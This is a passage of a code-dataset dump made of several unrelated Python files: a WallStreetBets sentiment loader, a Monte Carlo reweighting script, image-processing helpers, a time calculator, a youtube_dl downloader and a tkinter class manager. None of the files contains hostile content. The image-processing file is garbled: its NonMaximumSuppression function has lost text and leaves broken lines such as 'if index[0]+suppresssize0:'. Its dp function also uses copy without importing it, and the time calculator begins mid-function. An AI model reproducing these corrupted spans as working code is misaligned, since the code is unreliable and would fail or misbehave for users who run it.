self.vocab.get_id(w.lower()) >= 0]\n\t\t\tif len(wordlist) == 
0:\n\t\t\t\tcontinue\n\t\t\tXwordList.append(wordlist)\n\t\t\tXfileList.append(row[0])\n\t\t\twordCounts = Counter(wordlist)\n\t\t\tfor (wordId, count) in wordCounts.items():\n\t\t\t\tif wordId >= 0:\n\t\t\t\t\tX_row_indices.append(len(row[0])+i)\n\t\t\t\t\tX_col_indices.append(wordId)\n\t\t\t\t\tX_values.append(count)\n\n\t\t\tsentiment_value = self.sentiment_function(row)\n\n\t\t\tif sentiment_value == \"very-bearish\":\n\t\t\t\tY.append(0)\n\t\t\telif sentiment_value == \"bearish\":\n\t\t\t\tY.append(1)\n\t\t\telif sentiment_value == \"neutral\":\n\t\t\t\tY.append(2)\n\t\t\telif sentiment_value == \"bullish\":\n\t\t\t\tY.append(3)\n\t\t\telif sentiment_value == \"very-bullish\":\n\t\t\t\tY.append(4)\n\n\n\t\tself.vocab.lock()\n\n\t\t#Create a sparse matrix in csr format\n\t\t# self.X = csr_matrix((X_values, (X_row_indices, X_col_indices)), shape=(max(X_row_indices)+1, self.vocab.get_vocab_size()))\n\t\tself.Y = np.asarray(Y)\n\t\tprint(self.Y.shape)\n\t\tprint(len(XwordList))\n\t\t#Randomly shuffle\n\t\tindex = np.arange(len(XwordList))\n\t\t# print(self.X.shape)\n\t\t# index = np.arange(self.X.shape[0])\n\t\tnp.random.shuffle(index)\n\t\t# self.X = self.X[index,:]\n\t\tself.XwordList = [torch.LongTensor(XwordList[i]) for i in index] #Two different sparse formats, csr and lists of IDs (XwordList).\n\t\tself.XfileList = [XfileList[i] for i in index]\n\t\tself.Y = self.Y[index]\n\n\n\tdef sentiment_function(self, df_row):\n\t\t# import pdb; pdb.set_trace()\n\t\tscore = df_row[1]\n\t\tcomments = df_row[2]\n\n\n\t\tscore = np.log(score + 0.00001)\n\t\tcomments = np.log(comments + 0.00001)\n\n\t\ttheta1 = 0.50\n\t\ttheta2 = 0.50\n\n\t\tsentiment = theta1*score + theta2*comments\n\t\t# import pdb; pdb.set_trace()\n\t\tbound1, bound2, bound3, bound4, bound5 = tuple(self.func_percentiles)\n\t\t# know i could have just made it return a number, but thought\n\t\t# i'd keep it string match to get a general concept across\n\t\tif sentiment >= bound1 and sentiment < bound2:\n\t\t\treturn 'bearish'\n\t\telif sentiment >= bound2 and sentiment < bound3:\n\t\t\treturn 'neutral'\n\t\telif sentiment >= bound3 and sentiment < bound4:\n\t\t\treturn 'bullish'\n\t\telif sentiment >= bound4 and sentiment < bound5:\n\t\t\treturn 'very-bullish'\n\t\telse:\n\t\t\treturn \"very-bearish\"\n\n\tdef get_stats_wsb(self, plot=False):\n\t\tscore = self.dataframe.iloc[:, 1].to_numpy()\n\t\tcomments = self.dataframe.iloc[:, 2].to_numpy()\n\n\t\tscore = np.log(score + 0.00001)\n\t\tcomments = np.log(comments + 0.00001)\n\n\n\t\ttheta1 = .50\n\t\ttheta2 = .50\n\t\tfunc = theta1 * score + theta2 * comments\n\t\tself.lowest_bound = func.min()\n\t\tprint(self.lowest_bound)\n\n\n\t\t## all pareto distributions which really shouldn't come as too\n\t\t## much of a surprise --\n\t\tif plot:\n\t\t\thist1 = plt.hist(score, bins=100, range=(0, 500))\n\t\t\thist2 = plt.hist(comments, bins=100, range=(0, 500))\n\t\t\tplt.show()\n\n\t\tscore_percentiles = []\n\t\tcomment_percentiles = []\n\t\tfunc_percentiles = []\n\t\tfor perc in range(0, 100, 20):\n\t\t\ts_perc = np.percentile(score, perc)\n\t\t\tc_perc = np.percentile(comments, perc)\n\t\t\tf_perc = np.percentile(func, perc)\n\t\t\tscore_percentiles.append(s_perc)\n\t\t\tcomment_percentiles.append(c_perc)\n\t\t\tfunc_percentiles.append(f_perc)\n\n\t\tself.score_percentiles = score_percentiles\n\t\tself.comment_percentiles = comment_percentiles\n\t\tself.func_percentiles = func_percentiles\n\t\tprint(self.func_percentiles)\n\n\nclass TwitterData():\n\tdef __init__(self, csv_file_path, 
dataframe=None, vocab=None, train=True):\n\t\t\"\"\" Reads in data into sparse matrix format \"\"\"\n\t\tif not vocab:\n\t\t\tself.vocab = Vocab()\n\t\telse:\n\t\t\tself.vocab = vocab\n\n\t\tif dataframe is not None:\n\t\t\tself.dataframe = dataframe\n\t\telse:\n\t\t\tself.dataframe = pd.read_csv(csv_file_path)\n\n\n\t\trows = self.dataframe.shape[0]\n\n\t\tX_values = []\n\t\tX_row_indices = []\n\t\tX_col_indices = []\n\t\tY = []\n\n\t\tXwordList = []\n\t\tXfileList = []\n\n\t\t#Read entries\n\t\tfor i in tqdm(range(len(self.dataframe))):\n\t\t\trow = self.dataframe.iloc[i, :]\n\t\t\ttitle = row[0]\n\t\t\twordlist = []\n\t\t\ttokenized_title = word_tokenize(title)\n\t\t\tfor w in tokenized_title:\n\t\t\t\tid = self.vocab.get_id(w.lower())\n\t\t\t\tif id >= 0:\n\t\t\t\t\twordlist.append(id)\n\n\t\t\tif len(wordlist) == 0:\n\t\t\t\tcontinue\n\t\t\tXwordList.append(wordlist)\n\t\t\tXfileList.append(row[0])\n\t\t\twordCounts = Counter(wordlist)\n\t\t\tfor (wordId, count) in wordCounts.items():\n\t\t\t\tif wordId >= 0:\n\t\t\t\t\tX_row_indices.append(len(row[0])+i)\n\t\t\t\t\tX_col_indices.append(wordId)\n\t\t\t\t\tX_values.append(count)\n\n\t\t\tY.append(row[1])\n\n\n\t\tself.vocab.lock()\n\n\t\t#Create a sparse matrix in csr format\n\t\t# self.X = csr_matrix((X_values, (X_row_indices, X_col_indices)), shape=(max(X_row_indices)+1, self.vocab.get_vocab_size()))\n\t\tself.Y = np.asarray(Y)\n\t\tprint(self.Y.shape)\n\t\tprint(len(XwordList))\n\t\t#Randomly shuffle\n\t\tindex = np.arange(len(XwordList))\n\t\t# print(self.X.shape)\n\t\t# index = np.arange(self.X.shape[0])\n\t\tnp.random.shuffle(index)\n\t\t# self.X = self.X[index,:]\n\t\tself.XwordList = [torch.LongTensor(XwordList[i]) for i in index] #Two different sparse formats, csr and lists of IDs (XwordList).\n\t\tself.XfileList = [XfileList[i] for i in index]\n\t\tself.Y = self.Y[index]\n\n\nclass WSBDataLarge():\n\tdef __init__(self, csv_file_path, dataframe=None, vocab=None, train=True):\n\t\t\"\"\" Reads in data into sparse matrix format \"\"\"\n\t\tif not vocab:\n\t\t\tself.vocab = Vocab()\n\t\telse:\n\t\t\tself.vocab = vocab\n\n\t\tif dataframe is not None:\n\t\t\tself.dataframe = dataframe\n\t\telse:\n\t\t\tself.dataframe = pd.read_csv(csv_file_path)\n\n\t\trows = self.dataframe.shape[0]\n\n\t\tstock_df = pd.read_csv(\"../data/GME.csv\")\n\t\tself.stock_price(stock_df)\n\n\n\t\tself.dataframe[\"timestamp\"] = pd.to_datetime(self.dataframe[\"timestamp\"], format='%Y-%m-%d %H:%M:%S')\n\n\t\tisBusinessday = BDay().onOffset\n\t\tmatch_series = self.dataframe[\"timestamp\"].map(isBusinessday)\n\t\tself.dataframe = self.dataframe[match_series].copy()\n\n\t\tX_values = []\n\t\tX_row_indices = []\n\t\tX_col_indices = []\n\t\tY = []\n\n\t\tXwordList = []\n\t\tXfileList = []\n\n\t\t#Read entries\n\t\tfor i in tqdm(range(len(self.dataframe))):\n\t\t\trow = self.dataframe.iloc[i, :]\n\t\t\ttitle = row[0]\n\t\t\twordlist = []\n\t\t\ttokenized_title = word_tokenize(title)\n\t\t\tfor w in tokenized_title:\n\t\t\t\tid = self.vocab.get_id(w.lower())\n\t\t\t\tif id >= 0:\n\t\t\t\t\twordlist.append(id)\n\n\t\t\t# wordList = [self.vocab.get_id(w.lower()) for w in word_tokenize(title) if self.vocab.get_id(w.lower()) >= 0]\n\t\t\tif len(wordlist) == 0:\n\t\t\t\tcontinue\n\t\t\tXwordList.append(wordlist)\n\t\t\tXfileList.append(row[0])\n\t\t\twordCounts = Counter(wordlist)\n\t\t\tfor (wordId, count) in wordCounts.items():\n\t\t\t\tif wordId >= 
0:\n\t\t\t\t\tX_row_indices.append(len(row[0])+i)\n\t\t\t\t\tX_col_indices.append(wordId)\n\t\t\t\t\tX_values.append(count)\n\n\t\t\t### Add Y logic\n\n\t\t\treddit_date = row[-1] + timedelta(days=1)\n\t\t\t#reddit_date_mon = row[-1] + timedelta(days=2)\n\t\t\tstr_time = reddit_date.strftime('%m') + '-' + reddit_date.strftime('%d')\n\t\t\t#str_time_mon = reddit_date_mon.strftime('%m') + '-' + reddit_date_mon.strftime('%d')\n\n\n\t\t\t# need to figure out the fix for Friday to Saturday\n\t\t\ttry:\n\t\t\t\tlabel = self.gme_stock_dict[str_time]\n\t\t\t\tY.append(label)\n\t\t\texcept:\n\t\t\t\t#Y.append(self.gme_stock_dict[str_time_mon])\n\t\t\t\tY.append(0)\n\n\n\t\tself.vocab.lock()\n\n\t\t#Create a sparse matrix in csr format\n\t\t# self.X = csr_matrix((X_values, (X_row_indices, X_col_indices)), shape=(max(X_row_indices)+1, self.vocab.get_vocab_size()))\n\n\t\tself.Y = np.asarray(Y)\n\t\tprint(self.Y.shape)\n\t\tprint(len(XwordList))\n\t\t#Randomly shuffle\n\t\tindex = np.arange(len(XwordList))\n\t\t# print(self.X.shape)\n\t\t# index = np.arange(self.X.shape[0])\n\t\tnp.random.shuffle(index)\n\t\t# self.X = self.X[index,:]\n\t\tself.XwordList = [torch.LongTensor(XwordList[i]) for i in index] #Two different sparse formats, csr and lists of IDs (XwordList).\n\t\tself.XfileList = [XfileList[i] for i in index]\n\t\tself.Y = self.Y[index]\n\n\n\tdef stock_price(self, dataframe):\n\t\tdataframe[\"Date\"] = pd.to_datetime(dataframe[\"Date\"], format='%Y-%m-%d %H:%M:%S')\n\t\t# start_date = min(self.dataframe['timestamp']) not working for some reason\n\t\tstart_date = \"2021-01-28 00:00:00\"\n\t\tdf = dataframe[[\"Date\", \"Open\", \"Close\", \"High\"]]\n\t\tdf = df[df[\"Date\"] >= start_date]\n\t\tdf[\"Date_str\"] = df[\"Date\"].dt.strftime('%m') + '-' + df[\"Date\"].dt.strftime('%d')\n\n\t\tdf['Up_Down'] = np.where((df[\"High\"] - df[\"Open\"]) > 0, 1, 0)\n\n\t\tprint(df.head)\n\t\tself.gme_stock_dict = pd.Series(df['Up_Down'].values, index=df.Date_str)\n\n\n\nif __name__ == '__main__':\n\twsb_file_path = \"../data/reddit_wsb.csv\"\n\twsb_data = load_csv(wsb_file_path)\n\tvocab = create_vocab(wsb_data['title'].values)\n\n\tsplit_point = int(len(wsb_data)*0.9)\n\ttrain_df = wsb_data[0:split_point]\n\tdev_df = wsb_data[split_point:]\n\tprint(train_df)\n\n\tprint(\"load train data\")\n\ttrain_data = WSBDataLarge(wsb_file_path, dataframe=train_df, vocab=vocab, train=True)\n\tdev_data = WSBDataLarge(wsb_file_path, dataframe=dev_df, vocab=vocab, train=False)\n\tdev_labels = dev_data.Y\n\tdev_unique, dev_counts = np.unique(dev_labels, return_counts=True)\n\n\tlabels = train_data.Y\n\tunique_labels, counts = np.unique(labels, return_counts=True)\n\tprint(unique_labels)\n\tprint(counts)\n\tplt.figure()\n\tplt.bar(unique_labels, counts)\n\t# plt.hist(labels, bins=5)\n\tplt.title(\"WSB Training Data Derived Class Distribution\")\n\tplt.xlabel(\"Classes\")\n\tplt.ylabel(\"Frequency\")\n\tplt.show()\n\n\tplt.figure(1)\n\tplt.bar(dev_unique, dev_counts)\n\t# plt.hist(labels, bins=5)\n\tplt.title(\"WSB Eval Data Derived Class Distribution\")\n\tplt.xlabel(\"Classes\")\n\tplt.ylabel(\"Frequency\")\n\tplt.show()\n\t# test = WSBDataLarge(\"../data/reddit_data.csv\")\n","repo_name":"ctyler9/natural-language-spring-2021","sub_path":"model/vocab.py","file_name":"vocab.py","file_ext":"py","file_size_in_byte":12117,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"17161748857","text":"#!/usr/bin/env python\nimport os\nimport argparse\nimport json\nimport 
time\n\nimport numpy as np\n\nfrom libspi.Genome import *\nfrom libspi.MonteCarloSampler import *\nimport libspi.IO as IO\nimport libspi.CommandLineUtils as cli\n\n##############################################################\n# CMD line options parser\n##############################################################\n\n\ndef parse_command_line_options():\n parser = argparse.ArgumentParser(\n description='Monte Carlo reweighting for Cre-Lox Recombination studies.')\n parser.add_argument('--input-file', '-i', type=str,\n help=\"Chromosome file structure. Chromosome is assumed to be circular.\")\n parser.add_argument('--output-file', '-o', type=str,\n required=True, help=\"Output file\")\n parser.add_argument('--trajectory-file', '-t', type=str,\n required=True, help=\"Trajectory file\")\n # parser.add_argument('--config', '-c', type=str, required=True, help=\"Simulation configuration file\")\n parser.add_argument('--lb', type=float, required=True,\n help=\"Lambda parameter\")\n parser.add_argument('--nu', type=float, required=True, help=\"Nu parameter\")\n parser.add_argument('--b', type=float, required=True, help=\"B parameter\")\n parser.add_argument('--rl', type=float, required=True,\n help=\"Reweighting radius for lambda parameter\")\n parser.add_argument('--rnu', type=float, required=True,\n help=\"Reweighting radius for nu parameter\")\n parser.add_argument('--rb', type=float, required=True,\n help=\"Reweighting radius for b parameter\")\n options = parser.parse_args()\n return options\n\n\n##############################################################\n# MAIN method\n##############################################################\nif __name__ == \"__main__\":\n #\n options = parse_command_line_options()\n # config = cli.load_configuration_file(options.config)\n\n # building the parameters grid\n # param_grid = cli.build_parameters_grid(config)\n param_grid = [(options.lb, options.nu, options.b)]\n\n print(\"Using %d parameters settings.\" % len(param_grid))\n\n # creating and loading genome structure file\n genome = Genome()\n genome.load_genome_from_file(options.input_file)\n\n # loading trajectory pool\n trajectory_pool = IO.load_trajectories_from_file(options.trajectory_file)\n filtered_pool = dict()\n\n for curr_param, curr_traj in trajectory_pool.items():\n c_l, c_nu, c_b = curr_param\n if (np.abs(c_l - options.lb) <= options.rl) and \\\n (np.abs(c_nu - options.nu) <= options.rnu) and \\\n (np.abs(c_b - options.b) <= options.rb):\n filtered_pool[curr_param] = curr_traj\n\n print(\"Reweighting using %d simulations.\" % len(filtered_pool.keys()))\n # creating the MC sampler\n mc = ReweightGridMonteCarloSampler(genome)\n\n # running and timing the sampler\n # t_start = time.time()\n trajectory_profile = mc.run(filtered_pool, param_grid)\n # t_elapsed = time.time() - t_start\n\n # saving objects to file\n IO.save_profiles_to_file(\n options.output_file, trajectory_profile, vars(options))\n","repo_name":"stracquadaniolab/spi-nf","sub_path":"bin/spi-reweight.py","file_name":"spi-reweight.py","file_ext":"py","file_size_in_byte":3235,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"75069214170","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Apr 08 10:15:52 2016\n\n@author: yimeng\n\"\"\"\n\nimport math, os, cv2, shutil\nimport numpy as np\n\ndef dp(InputCost):\n # dynamic programming \n\n weight_smooth = 2\n edge = np.ones(InputCost.shape[1])\n paths = np.ones(InputCost.shape[0]) \n backtracing = 
np.ones(InputCost.shape)\n CAM = copy.deepcopy(InputCost) # cost accumulate matrix\n \n for i in range(1, InputCost.shape[1]):\n for j in range(InputCost.shape[0]):\n for k in range(InputCost.shape[0]):\n paths[k] = weight_smooth*np.absolute(j-k) + CAM[k, i-1] + CAM[j, i]\n \n CAM[j,i] = paths.min() \n backtracing[j,i] = paths.argmin()\n \n edge[-1] = CAM[:,-1].argmin()\n \n for i in range(InputCost.shape[1]-2, -1, -1):\n edge[i] = backtracing[int(edge[i+1]), i+1]\n \n return edge\n \ndef openning(inputmatrix, wind_size = (3,3)):\n # mathematical morphology: openning\n \n kernel = np.ones(wind_size, np.uint8)\n erosion = cv2.erode(inputmatrix, kernel)\n dilation = cv2.dilate(erosion, kernel)\n return dilation\n \ndef closing(inputmatrix, wind_size = (3,3)):\n # mathematical morphology: closing\n \n kernel = np.ones(wind_size, np.uint8)\n dilation = cv2.dilate(inputmatrix, kernel)\n erosion = cv2.erode(dilation, kernel)\n return erosion\n \ndef normalize_std(data):\n # standard normalize\n data_mean = data.mean(axis = 0)\n data_std = data.std(axis = 0) \n data_std[data_std == 0] = 1 \n return (data - data_mean)/data_std, data_mean, data_std \n \ndef relativeDistance(inputdata):\n temp_data = np.vstack((inputdata[0], inputdata[1]))\n\n dist = 0\n for i in range(len(inputdata[0])):\n for j in range(len(inputdata[0])):\n if i!= j:\n dist += np.sqrt((temp_data[0,i] - temp_data[0,j])**2 + (temp_data[1,i] - temp_data[1,j])**2)\n \n return dist\n \ndef zeropadding(matrix, padsize1, padsize2, constant_val = 0):\n leftPad,rightPad,topPad,bottomPad = padsize1, padsize1, padsize2, padsize2\n pads = ((leftPad,rightPad),(topPad,bottomPad))\n return np.pad(matrix, pads, 'constant', constant_values = constant_val)\n\ndef NonMaximumSuppression(labelmap,scoremap,suppresssize):\n finallabel = np.zeros((0,4))\n mapshape = np.array([scoremap.shape[0:2]])\n while (scoremap>0).any():\n index = scoremap.argmax()\n index = np.array([index/mapshape[0,1],index%mapshape[0,1]])\n singlelabel = np.array([[labelmap[index[0],index[1]],scoremap[index[0],index[1]],index[0],index[1]]])\n finallabel = np.concatenate((finallabel,singlelabel),0)\n suppressedLoc = np.array([0,0,mapshape[0,0],mapshape[0,1]])\n if index[0]-suppresssize>0:\n suppressedLoc[0] = index[0]-suppresssize\n if index[0]+suppresssize0:\n suppressedLoc[1] = index[1]-suppresssize\n if index[1]+suppresssize 60:\n add_hr += (min_24hr + duration_minutes_org)//60\n duration_hour = duration_hour_org + add_hr\n duration_minutes = (min_24hr + duration_minutes_org) - (add_hr*60)\n else:\n duration_hour = duration_hour_org\n duration_minutes = duration_minutes_org\n \n if (hour_24hr + duration_hour) > 24:\n cal_nextday += (hour_24hr + duration_hour)//24\n \n #Calculate display day of week\n if str(dayofwk).capitalize() in dayofweek:\n next_day = \"\"\n cal_dow = None\n\n if cal_nextday == 0:\n str_nextday = \", \" + str(dayofwk.capitalize())\n else:\n if (dayofweek[str(dayofwk).capitalize()] + cal_nextday) > 7:\n cal_dow = (dayofweek[str(dayofwk).capitalize()] + cal_nextday)%7\n else:\n cal_dow = dayofweek[str(dayofwk).capitalize()] + cal_nextday\n \n next_day = [k for k, v in dayofweek.items() if v == cal_dow][0]\n \n if cal_nextday == 1:\n str_nextday = \", \" + next_day + \" (next day)\"\n else:\n str_nextday = \", \" + next_day + \" (\" + str(cal_nextday) +\" days later)\"\n \n #calculate new_time\n cal_time = start_time + timedelta(minutes=duration_minutes_org, hours=duration_hour_org)\n \n #Show output\n if dayofwk == None:\n if cal_nextday == 1:\n new_time = 
cal_time.time().strftime('%-I:%M %p') + \" (next day)\"\n elif cal_nextday > 1:\n new_time = cal_time.time().strftime('%-I:%M %p') + \" (\" + str(cal_nextday) + \" days later)\"\n else:\n new_time = cal_time.time().strftime('%-I:%M %p')\n else:\n new_time = str(cal_time.time().strftime('%-I:%M %p')) + str_nextday\n\n return new_time","repo_name":"natthayasp/boilerplate-time-calculator-Public","sub_path":"time_calculator.py","file_name":"time_calculator.py","file_ext":"py","file_size_in_byte":2228,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"20003935431","text":"def fib(x):\n a=x[0]\n b=x[1]\n for i in range(2,len(x)):\n if x[i]==(a+b):\n a=b\n b=x[i]\n else:\n return False\n return True\n\nn=int(input())\nx=list(map(int,input().split()))\nif len(x)<=2:\n print('no')\nelif fib(x):\n print('yes')\nelse:\n print('no')","repo_name":"Shavukarusasikumar/codemind-python","sub_path":"Fibonacci_array.py","file_name":"Fibonacci_array.py","file_ext":"py","file_size_in_byte":308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"34601607969","text":"#!/usr/bin/env python\nimport re\n\narr = [1, 4, 8, 9, 7, 5]\n\ndef e_arr():\n for i, v in enumerate(arr):\n yield (i, v)\n\nfor i, v in e_arr():\n print(i, v)\n\nmatch = re.search('(?P.*)\\s+(?P.*)', 'paul 12345')\nname = match.group('name')\nphone = match.group('phone')\nprint(name, phone)\n\nm = re.findall('H', 'hHhHH')\nprint(len(m))\n","repo_name":"allred/allred","sub_path":"sketch/sketch.py","file_name":"sketch.py","file_ext":"py","file_size_in_byte":347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"20433189483","text":"from __future__ import unicode_literals\nimport os\nimport os.path\n\nimport youtube_dl\n\nclass DownloaderAPI():\n DOWNLOAD_LOCATION = 'downloads/'\n available_videos = { }\n\n def __init__(self):\n self.ydl_opts = { # options for youtube_dl\n 'format': 'bestaudio/best',\n 'postprocessors': [{\n 'key': 'FFmpegExtractAudio',\n 'preferredcodec': 'mp3',\n 'preferredquality': '192',\n }],\n 'outtmpl': self.DOWNLOAD_LOCATION + '%(id)s.%(ext)s'\n }\n\n # initiliaze the ydlObject\n self.ydl = youtube_dl.YoutubeDL(self.ydl_opts)\n self._populate_entries()\n\n def is_url_valid(self, url):\n try:\n # Get information about the YouTube video/song\n info = self.ydl.extract_info(url, download=False)\n return info['id']\n except:\n # The url does not exists or is wrong!\n return None\n\n def download(self, videoId, url):\n if videoId not in self.available_videos:\n try:\n self.ydl.download([url])\n except: # something went wrong at downloading process!\n raise\n\n filepath = os.path.join( self.DOWNLOAD_LOCATION, videoId + '.mp3' )\n self.available_videos[videoId] = filepath\n\n print(f'Saved video \"{videoId}\" @ \"{filepath}\"')\n else:\n print(f'Video \"{videoId}\" already downloaded!')\n\n def get_filepath(self, videoId):\n return self.available_videos[videoId]\n\n def _populate_entries(self):\n entries = { }\n for p in os.scandir(self.DOWNLOAD_LOCATION):\n if p.is_file():\n videoId = p.name.split('.')[0]\n entries[videoId] = os.path.realpath(p.path)\n\n self.available_videos = entries\n","repo_name":"kkanellis/genrec","sub_path":"web/server/downloader.py","file_name":"downloader.py","file_ext":"py","file_size_in_byte":1829,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} 
+{"seq_id":"14449429926","text":"#!/bin/python3\n\nimport sys\n\n\ndef arithmetic_progression_sum(a0, an, n):\n return (a0 + an) * n >> 1\n\n\ndef calc_sum(maximum, d):\n a0 = d\n\n if d > maximum:\n return 0\n n = maximum // d\n an = n * d\n\n if an == maximum:\n an -= d\n n -= 1\n\n return arithmetic_progression_sum(a0, an, n)\n\n\ndef calc_sum_slow(maximum, d):\n a = 0\n for x in range(d, maximum, d):\n a += x\n return a\n\n\ndef calc_sum_multiples_3_5(n):\n s1 = calc_sum(n, 3)\n s2 = calc_sum(n, 5)\n s3 = calc_sum(n, 15)\n return int(s1 + s2 - s3)\n\n\ndef main():\n t = int(input().strip())\n for a0 in range(t):\n n = int(input().strip())\n print(calc_sum_multiples_3_5(n))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"mastergreg/hackerrank","sub_path":"eulerchallenge/euler_001.py","file_name":"euler_001.py","file_ext":"py","file_size_in_byte":741,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"19626751790","text":"__author__ = \"alvaro barbeira\"\n\nimport re\nimport os\nimport pandas\n\nr_ = re.compile(\"(.*)_chr([0-9]+)_sb([0-9]+)_reg0.1_ff0.01_by_region.txt.gz\")\nr2_ = re.compile(\"gwas_parsing_(.*)_chr([0-9]+)_sb([0-9]+)_by_region.sh\")\n\n\ndef _r(path, r):\n files = os.listdir(path)\n results = []\n for f in files:\n s = r.search(f)\n results.append((s.group(1), s.group(2), s.group(3)))\n return results\n\ndef _p(results):\n results = pandas.DataFrame(data=results,columns= [\"trait\", \"chromosome\", \"sb\"])\n results[\"k\"] = results.chromosome + \"_\" + results.sb\n g = results[[\"trait\", \"k\"]].groupby(\"trait\").aggregate([\"count\"])\n g= g.reset_index(level=\"trait\", col_level=1)\n g.columns = g.columns.droplevel()\n g = g.sort_values(by=\"count\")\n return g\n\nresults = _r(\"results_summary_imputation\", r_)\nresults = _p(results)\n\njobs = _r(\"old/jobs_summary_imputation/\", r2_)\njobs = _p(jobs)\n#from import embed; embed()","repo_name":"hakyimlab/gtex-miscellaneous-processing","sub_path":"src/misc/_check.py","file_name":"_check.py","file_ext":"py","file_size_in_byte":934,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"2941370429","text":"from tkinter import *\nimport tkinter.ttk as tk\nimport json\n\nBLACK = \"#1C2626\"\nWHITE = \"#FFFFFF\"\nRED = \"#FF0000\"\nPURPLE = \"#552D96\"\nGREEN = \"#00FF00\"\nGRAY = \"#C4C4C4\"\nFONT = \"Poppins\"\n\nclass ManageClass:\n def __init__(self, main_window):\n self.main_window = main_window\n self.search_text = StringVar()\n self.class_text = StringVar()\n self.course_text = StringVar()\n self.lec_text = StringVar()\n self.time_text = StringVar()\n self.search = \"\"\n self.class_name = \"\"\n self.course_name = \"\"\n self.lec_name = \"\"\n self.time_stamp = \"\"\n \n with open(\"../data/class_student.json\", mode=\"r\") as file:\n self.class_dict = json.load(file)\n\n # -------------------------------------------- add class function -------------------------------------------- #\n def callback_add_class(self, *args):\n self.class_name = str(self.class_text.get())\n self.course_name = str(self.course_text.get())\n self.lec_name = str(self.lec_text.get())\n self.time_stamp = str(self.time_text.get())\n\n def vcmd_add_class(self):\n self.class_text.trace_add(\"write\", callback=self.callback_add_class)\n self.course_text.trace_add(\"write\", callback=self.callback_add_class)\n self.lec_text.trace_add(\"write\", callback=self.callback_add_class)\n self.time_text.trace_add(\"write\", 
callback=self.callback_add_class)\n\n def add_new_schedule(self, *event):\n if len(self.class_name)<=0 or len(self.course_name)<=0 or len(self.lec_name)<=0 or len(self.time_stamp)<=0:\n self.indicator_label.configure(text=\"Please Enter the Field!\", fg=RED)\n return self.add_frame.after(1000, func=self.add_class_schedule)\n\n key_checker = [key for key in self.class_dict]\n if self.class_name in key_checker:\n self.indicator_label.configure(text=\"Class Already Exists!\", fg=RED)\n return self.add_frame.after(1000, func=self.add_class_schedule)\n \n data = {\n \"Subject\": str(self.course_name),\n \"StudentNIM\": [],\n \"Lecturer\": str(self.lec_name),\n \"Time\": str(self.time_stamp),\n \"Session\":{}\n }\n self.class_dict[f\"{self.class_name}\"] = data\n\n with open(\"../data/class_student.json\", mode=\"w\") as file:\n file.write(str(json.dumps(self.class_dict, indent=4, sort_keys=True)))\n\n self.indicator_label.configure(text=\"Class Added!\", fg=GREEN)\n self.add_frame.after(1000, func=self.manage_class)\n\n # -------------------------------------------- add class ui -------------------------------------------- #\n def add_class_schedule(self):\n # --------------- reset page\n for widget in self.main_window.winfo_children():\n widget.destroy()\n\n with open(\"../data/class_student.json\", mode=\"r\") as file:\n self.class_dict = json.load(file)\n \n self.add_frame = Frame(self.main_window, bg=BLACK)\n self.add_frame.grid(column=0, row=0)\n\n # --------------- label add schedule\n add_schedule_label = Label(self.add_frame, text=\"ADD CLASS SCHEDULE\", fg=WHITE, bg=BLACK, font=(FONT, 35, \"bold\"))\n add_schedule_label.grid(column=0, row=0, columnspan=3, pady=(0, 20))\n\n # --------------- class name label and entry\n class_name_label = Label(self.add_frame, text=\"Class Name\", fg=WHITE, bg=BLACK, font=(FONT, 12))\n class_name_label.grid(column=1, row=1, sticky=\"W\")\n\n class_entry = Entry(self.add_frame, textvariable=self.class_text, width=35, validate=\"focusin\", validatecommand=self.vcmd_add_class)\n class_entry.configure(background=BLACK, fg=WHITE, font=(FONT, 16))\n self.class_text.set(\"\")\n class_entry.grid(column=1, row=2, pady=(0, 10), sticky=\"W\")\n\n # --------------- course name label and entry\n course_name_label = Label(self.add_frame, text=\"Course Name\", fg=WHITE, bg=BLACK, font=(FONT, 12))\n course_name_label.grid(column=1, row=3, sticky=\"W\")\n\n course_name_entry = Entry(self.add_frame, textvariable=self.course_text, width=35, validate=\"focusin\", validatecommand=self.vcmd_add_class)\n course_name_entry.configure(background=BLACK, fg=WHITE, font=(FONT, 16))\n self.course_text.set(\"\")\n course_name_entry.grid(column=1, row=4, pady=(0, 10), sticky=\"W\")\n\n # --------------- lecturer name label and entry\n lec_name_label = Label(self.add_frame, text=\"Lecturer\", fg=WHITE, bg=BLACK, font=(FONT, 12))\n lec_name_label.grid(column=1, row=5, sticky=\"W\")\n\n lec_name_entry = Entry(self.add_frame, textvariable=self.lec_text, width=35, validate=\"focusin\", validatecommand=self.vcmd_add_class)\n lec_name_entry.configure(background=BLACK, fg=WHITE, font=(FONT, 16))\n self.lec_text.set(\"\")\n lec_name_entry.grid(column=1, row=6, pady=(0, 10), sticky=\"W\")\n\n # --------------- time label and entry\n time_label = Label(self.add_frame, text=\"Time\", fg=WHITE, bg=BLACK, font=(FONT, 12))\n time_label.grid(column=1, row=7, sticky=\"W\")\n\n time_entry = Entry(self.add_frame, textvariable=self.time_text, width=35, validate=\"focusin\", 
